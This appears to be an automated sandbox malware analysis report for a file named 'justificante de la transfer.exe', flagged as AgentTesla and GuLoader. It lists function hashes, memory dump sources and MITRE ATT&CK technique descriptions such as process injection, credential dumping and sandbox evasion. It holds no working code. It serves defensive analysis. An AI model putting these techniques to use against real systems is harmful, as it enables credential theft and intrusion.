Instruction Fuzzy Hash: 4041C530A082499FCB01DBB4C8946FD7BF5AF8A310F19847AD145AB295DF359D06CB72

Uniqueness

Uniqueness Score: -1.00%

Function 00DFB78D, Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.5672119616.0000000000DF0000.00000040.00000010.sdmp, Offset: 00DF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a73aba5c045451cf3e9a3b17544187d17f8740f984f443fafef5f33e13085d32
Instruction ID: 70849c5ae5dcbc5a93a35d07e51ac69160023571080612e56f30a13cc221cc64
Opcode Fuzzy Hash: a73aba5c045451cf3e9a3b17544187d17f8740f984f443fafef5f33e13085d32
Instruction Fuzzy Hash: 3B317574B002085BDB14ABB8C894BBE73979FC5365F25C46AE61AEF395DB30DC018B61

Uniqueness

Uniqueness Score: -1.00%

Function 00DF67E9, Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.5672119616.0000000000DF0000.00000040.00000010.sdmp, Offset: 00DF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a458c617209c798bc2c8a57b5801932e52b7f54f2735474afc3d2f146437990a
Instruction ID: 0a5b47ebd677703e985a7216139bc094859dc2a2f055e4c3605579f1ed2b3340
Opcode Fuzzy Hash: a458c617209c798bc2c8a57b5801932e52b7f54f2735474afc3d2f146437990a
Instruction Fuzzy Hash: D831C131A0465C9FCB05CF98D8948EEFBB4FF89310B15806AE904AB745C731A955CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 00DFB7B5, Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.5672119616.0000000000DF0000.00000040.00000010.sdmp, Offset: 00DF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14b52a3ce64548c378357bc3d94492e62989a0cd53d55717306f29adb45b9b0d
Instruction ID: 0422205268699ab03aaf9286ea168e20673fa3de738d25f43c5a5fa6da5f1535
Opcode Fuzzy Hash: 14b52a3ce64548c378357bc3d94492e62989a0cd53d55717306f29adb45b9b0d
Instruction Fuzzy Hash: 32219474F001089BDB14DB78C894BBE73A6DFC9365F25C46AE619AB394DB31EC018B61

Uniqueness

Uniqueness Score: -1.00%

Function 00DFB329, Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.5672119616.0000000000DF0000.00000040.00000010.sdmp, Offset: 00DF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 077a2d222fb9b537fd115b4a076007aa1533efedd9ecab176f63901f1409963f
Instruction ID: 01bc13a686e3e0776ee2cc25de3e32238100254fdcf1b5c83135f9e3c39aa675
Opcode Fuzzy Hash: 077a2d222fb9b537fd115b4a076007aa1533efedd9ecab176f63901f1409963f
Instruction Fuzzy Hash: 9E219175B0060A9FCB14DFB4D884AAFB7B6EF84304F20C82AD61687600D731AD56CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1D97D3D8, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.5694256327.000000001D97D000.00000040.00000001.sdmp, Offset: 1D97D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8954371bdf1f29ac8b0a91c061c555ccf3b2724b9979bd2472be1e396bd6c015
Instruction ID: 8014c09c36204c13bbef21201ed97aee8b7590fbf0c62f8c436e6681601659c5
Opcode Fuzzy Hash: 8954371bdf1f29ac8b0a91c061c555ccf3b2724b9979bd2472be1e396bd6c015
Instruction Fuzzy Hash: 0E21F572604240DFDB02DF58D9C0B26BF69FB88724F24C56DD9094B296C336E456CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 1D98D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.5694569475.000000001D98D000.00000040.00000001.sdmp, Offset: 1D98D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef0dcb134dbcce28a0d626be656b3e14c6a0bf44984bac0ce49720d8e90b3cdc
Instruction ID: fd65c22207a59a63cbc20beddc9532903b8d21d2e0b56490d7f7faaae839d030
Opcode Fuzzy Hash: ef0dcb134dbcce28a0d626be656b3e14c6a0bf44984bac0ce49720d8e90b3cdc
Instruction Fuzzy Hash: DA21F571604288DFDB06DF68D980B16BB65FB84B24F20C56DD9494B387C736D447CA62

Uniqueness

Uniqueness Score: -1.00%

Function 1D98D006, Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.5694569475.000000001D98D000.00000040.00000001.sdmp, Offset: 1D98D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5ac5f560e338dda2273310d3b7eafa9e4f4134b5808618d6198c98b6959ca2b
Instruction ID: 905acee29f12b313443376465cab88acaecb04041b6f3ffe610a15e1fe0795d5
Opcode Fuzzy Hash: c5ac5f560e338dda2273310d3b7eafa9e4f4134b5808618d6198c98b6959ca2b
Instruction Fuzzy Hash: BC219F755083C49FC703CF24D990B11BF75EB46714F24C5AAD8498B2A7C33AD81ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 00DF6A90, Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.5672119616.0000000000DF0000.00000040.00000010.sdmp, Offset: 00DF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11b6965936dea2a819b0e031e3477ef20dca45e6e6a9dd8d661e23af98bbed1b
Instruction ID: 16976f90beacb5133bc76704371bdc94bf5159faf8421387a040a38af5366910
Opcode Fuzzy Hash: 11b6965936dea2a819b0e031e3477ef20dca45e6e6a9dd8d661e23af98bbed1b
Instruction Fuzzy Hash: 3D21A531A002099BDB10CF68C880BAABBF2EF85354F15C556D658EB691D371E810C7B4

Uniqueness

Uniqueness Score: -1.00%

Function 1D97D3D3, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.5694256327.000000001D97D000.00000040.00000001.sdmp, Offset: 1D97D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2864fe0d2bcbf4d12a03d87d332bbcd569bcc6e6de2520bbea87ec7fae0928f
Instruction ID: 2fba6111d5c330032afc414ee154368a44a7ae5d33d38197ed50ae2b498ed85c
Opcode Fuzzy Hash: f2864fe0d2bcbf4d12a03d87d332bbcd569bcc6e6de2520bbea87ec7fae0928f
Instruction Fuzzy Hash: 8F117F76504281DFDB02CF14D5C4B16BF62FB84324F2486ADD9494B656C33AE456CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 00DF4DD9, Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.5672119616.0000000000DF0000.00000040.00000010.sdmp, Offset: 00DF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 649715b392de7cfb39f9555406a1548a1381201d7586d2b3ad6c2497f4a112ba
Instruction ID: 6c1c57069ef48387c0b761b779b897abab0321c0e39e448002ae3b172f0cf434
Opcode Fuzzy Hash: 649715b392de7cfb39f9555406a1548a1381201d7586d2b3ad6c2497f4a112ba
Instruction Fuzzy Hash: B3F0A071E052158FC7519BB998081BEBFF4EA8822271582BAEA5AD3641D63049168BE1

Uniqueness

Uniqueness Score: -1.00%

Function 00DF9F20, Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.5672119616.0000000000DF0000.00000040.00000010.sdmp, Offset: 00DF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e812ce56dfdb0fa2a1a8ee6bf31f0514c9d919f92b309fa48963030cb2130e7
Instruction ID: a2ffda32acdb425d8985388e7de59c65758308c2863b8a098e21a18f90a09a94
Opcode Fuzzy Hash: 8e812ce56dfdb0fa2a1a8ee6bf31f0514c9d919f92b309fa48963030cb2130e7
Instruction Fuzzy Hash: 49F0903090968AEFCF01DBB4D5A18ACBB74EF41304B5184DEE50097662DB312A15CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00DFDF60, Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.5672119616.0000000000DF0000.00000040.00000010.sdmp, Offset: 00DF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81a4970eb41c9cfda5839660f143023e8d68e254a5b78e0355941a49b57932cf
Instruction ID: 1f79b19f43d2d6d903dab31d27e7b6031ed099451c3451ba5b0d004c1d9cff0f
Opcode Fuzzy Hash: 81a4970eb41c9cfda5839660f143023e8d68e254a5b78e0355941a49b57932cf
Instruction Fuzzy Hash: 1EF0F470C4538ACFCB41DFB488556AEBFF2EF09200F618A9EC555E6242D77545058FA1

Uniqueness

Uniqueness Score: -1.00%

Function 00DF4DE8, Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.5672119616.0000000000DF0000.00000040.00000010.sdmp, Offset: 00DF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34b6f68c41ae6ddb5646f8f81495ac033964722c7ac463b74ad1be65d2f31a58
Instruction ID: da734f24f05e6d219ff28219fe52e746477314fd4d0225b5b7ee18dbed796b97
Opcode Fuzzy Hash: 34b6f68c41ae6ddb5646f8f81495ac033964722c7ac463b74ad1be65d2f31a58
Instruction Fuzzy Hash: 91E04875E002299F8B50DFBD98445BF7FF9EA8C661B154176E61DD3300EA308A118BE1

Uniqueness

Uniqueness Score: -1.00%

Function 00DFC850, Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.5672119616.0000000000DF0000.00000040.00000010.sdmp, Offset: 00DF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59b7fc36336a99a06b1a1ca9a601ddb5ab14b11146248ada307d13e19d36cc84
Instruction ID: cc21b13bf0cfffb95cbd51843993e10bbff2b5817ec76fdf900685d2f1de99df
Opcode Fuzzy Hash: 59b7fc36336a99a06b1a1ca9a601ddb5ab14b11146248ada307d13e19d36cc84
Instruction Fuzzy Hash: 7FE08636B040358FDB0C9B3499982BD77B7FBC82627198069D52EC3300DE314C128B40

Uniqueness

Uniqueness Score: -1.00%

Function 00DFD380, Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.5672119616.0000000000DF0000.00000040.00000010.sdmp, Offset: 00DF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a72c656a9d04a7f270621c6439061af64090b9ee817f92b357b33f20c0b4434
Instruction ID: 92b205a7cc862d887fa2ee52a5017b398e082ed724f46437915c51d89eaa8c09
Opcode Fuzzy Hash: 1a72c656a9d04a7f270621c6439061af64090b9ee817f92b357b33f20c0b4434
Instruction Fuzzy Hash: 4EE02B623893052BE300A57ED88073EB9CB9BC1260F89C139A70CCB781DC25DC04937B

Uniqueness

Uniqueness Score: -1.00%

Function 00DF5AF3, Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.5672119616.0000000000DF0000.00000040.00000010.sdmp, Offset: 00DF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 798298dd020f1e27a9accc838fcb8ca4946125c35f63278b6be6415a3df95ab0
Instruction ID: 443b8c506d15e3a57b6da807e682380eceb49a4b1908e82b7152769dffc49dd5
Opcode Fuzzy Hash: 798298dd020f1e27a9accc838fcb8ca4946125c35f63278b6be6415a3df95ab0
Instruction Fuzzy Hash: 23E01A30A4012BCBDB189FB1EA9D7BDBB75AF80354F258928DB12E7194DF708941CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00DFDF70, Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.5672119616.0000000000DF0000.00000040.00000010.sdmp, Offset: 00DF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a720ad540f6c645d9934f3517a46698e48e65877835b33e885ae8ceb60c5f33
Instruction ID: 68cf98d0e9fdfb5b36d5302f28433d48cce99da6724566dee7cd1f490bb59d8b
Opcode Fuzzy Hash: 6a720ad540f6c645d9934f3517a46698e48e65877835b33e885ae8ceb60c5f33
Instruction Fuzzy Hash: 0EE0EDB0D0020EDFCB40EFB884457AEBBF6AF04300F61896AC506E6241E7B586418FE1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00E29D44, Relevance: 1.8, Instructions: 1791COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.5672690677.0000000000E20000.00000040.00000010.sdmp, Offset: 00E20000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35447f8fb92bf473447783677ead5228060dda9dd76499620e3d7ca58559cdb1
Instruction ID: 94ffb1531341aeb3ddd070b210ef7cf241bb0a0bd85900844b9b39b42b478a26
Opcode Fuzzy Hash: 35447f8fb92bf473447783677ead5228060dda9dd76499620e3d7ca58559cdb1
Instruction Fuzzy Hash: 29031E70D106198ECB14EF68C894AADF7B1FF99300F15D69AD459BB211EB70AAC4CF81

Uniqueness

Uniqueness Score: -1.00%

Function 00DF3330, Relevance: .8, Instructions: 806COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.5672119616.0000000000DF0000.00000040.00000010.sdmp, Offset: 00DF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 083db92440ca091f572a5f9dd5afe15998cb40ebc0b54507ed089d3b45438c49
Instruction ID: 54013a0caaa2aff0c292fce4a8377dd8a65a4ee58a825f3ccfcc74913daeee13
Opcode Fuzzy Hash: 083db92440ca091f572a5f9dd5afe15998cb40ebc0b54507ed089d3b45438c49
Instruction Fuzzy Hash: 4352E51224C385EECB220FA6C5751AB3BA1EF4B31431B98DBCD814F079E6756652F322

Uniqueness

Uniqueness Score: -1.00%

Function 00E21C28, Relevance: .4, Instructions: 433COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.5672690677.0000000000E20000.00000040.00000010.sdmp, Offset: 00E20000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79fe4afad72f77f4abc3f3d8633985e2c5d0ce399e4860131b65dd51293837d5
Instruction ID: 4329e925a6a29a91e3931ef1b4743539532bbe19bbc76517be22bfb901cd4950
Opcode Fuzzy Hash: 79fe4afad72f77f4abc3f3d8633985e2c5d0ce399e4860131b65dd51293837d5
Instruction Fuzzy Hash: 88027F34A002289FCB14DBB8D884BADB7F6BF84305F1184A9D50AEB355DF35AD41CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A0A200, Relevance: .3, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.5668408707.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9821b456ff8923da108c6cf58b987dd9212edc901152368b0790dffd2e853dd4
Instruction ID: dc3b853bdfa2b0517dd8f09169e813138a986eea2f3163bfa6303959849d62e7
Opcode Fuzzy Hash: 9821b456ff8923da108c6cf58b987dd9212edc901152368b0790dffd2e853dd4
Instruction Fuzzy Hash: 73C1D870A04719CBCF185F6998582ADBAB6BFC8740F588929D446A62C8DF34CC92D763

Uniqueness

Uniqueness Score: -1.00%

Function 00DF44F8, Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.5672119616.0000000000DF0000.00000040.00000010.sdmp, Offset: 00DF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3ef9957a4f3ab342a78e5647bf032883d15bbf7402c077e3053cff8087ef7eb
Instruction ID: 60da3c397f37f3a57107190f3485e0a7a1b4ddb4b64c90baa69a7ded32eec842
Opcode Fuzzy Hash: a3ef9957a4f3ab342a78e5647bf032883d15bbf7402c077e3053cff8087ef7eb
Instruction Fuzzy Hash: E5B1D77470421ACBDB285A7A844933B76B6AFC5790F2ECD2DC596C6288DF34CC419B72

Uniqueness

Uniqueness Score: -1.00%

Function 00A41120, Relevance: .3, Instructions: 270COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.5669100300.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 522f45b0734574bb1bae8e2cf00a1f042c276afee8db7c366324acd87afbd39b
Instruction ID: 51b0ceede9070e3baa3941b8bbfdac5b28799d3b8d7c75e1ccf79e84fa40aa8a
Opcode Fuzzy Hash: 522f45b0734574bb1bae8e2cf00a1f042c276afee8db7c366324acd87afbd39b
Instruction Fuzzy Hash: 5E917338B083289BCB8C9FB584947BE77B76FC9714B19852DE506DB284DE349842C791

Uniqueness

Uniqueness Score: -1.00%

Function 00AC07E0, Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.5670153967.0000000000AC0000.00000040.00000010.sdmp, Offset: 00AC0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59874456f9f3087477c19cb2d97b9e51b5ca00a466b2c38cdefa4e91ed89cb86
Instruction ID: b88965596b6094f99b570e6883ba55764eef49a513c39c684da2263fd125a03c
Opcode Fuzzy Hash: 59874456f9f3087477c19cb2d97b9e51b5ca00a466b2c38cdefa4e91ed89cb86
Instruction Fuzzy Hash: 14A14E32E002198FCF15DFB5C984ADEB7B2FF85310B16456EE905AB261DB31D955CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00A43708, Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.5669100300.0000000000A40000.00000040.00000001.sdmp, Offset: 00A40000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0fa9490964ad4d59d4fd3987b56e040585d1624c14347759074ee3831020dc2
Instruction ID: 22397c694c57275b69e51801dcd9ca71bf61bcdd0920d8132c76c00708dae07e
Opcode Fuzzy Hash: d0fa9490964ad4d59d4fd3987b56e040585d1624c14347759074ee3831020dc2
Instruction Fuzzy Hash: 8E918DB5E00209DFDF14CFA9C8917DDFBF2AF88304F248529E445AB294EB749945CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A04A28, Relevance: .2, Instructions: 235COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.5668408707.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87bee48a6a04e38bc411b4cfee61e1a5507f192cfc08094af61e689e30840fe7
Instruction ID: df97775d81e71e60ee3e9e0a3630db9f15da49e427fa07d2ff30aac8c1bfb0e3
Opcode Fuzzy Hash: 87bee48a6a04e38bc411b4cfee61e1a5507f192cfc08094af61e689e30840fe7
Instruction Fuzzy Hash: 51914AB1E0020D9FDF20CF99D8847AEBBB1FB59310F15882AE615E7291D734ED508BA5

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report justificante de la transfer.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Agenttesla

Threatname: GuLoader

Yara Overview

Memory Dumps

Sigma Overview

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre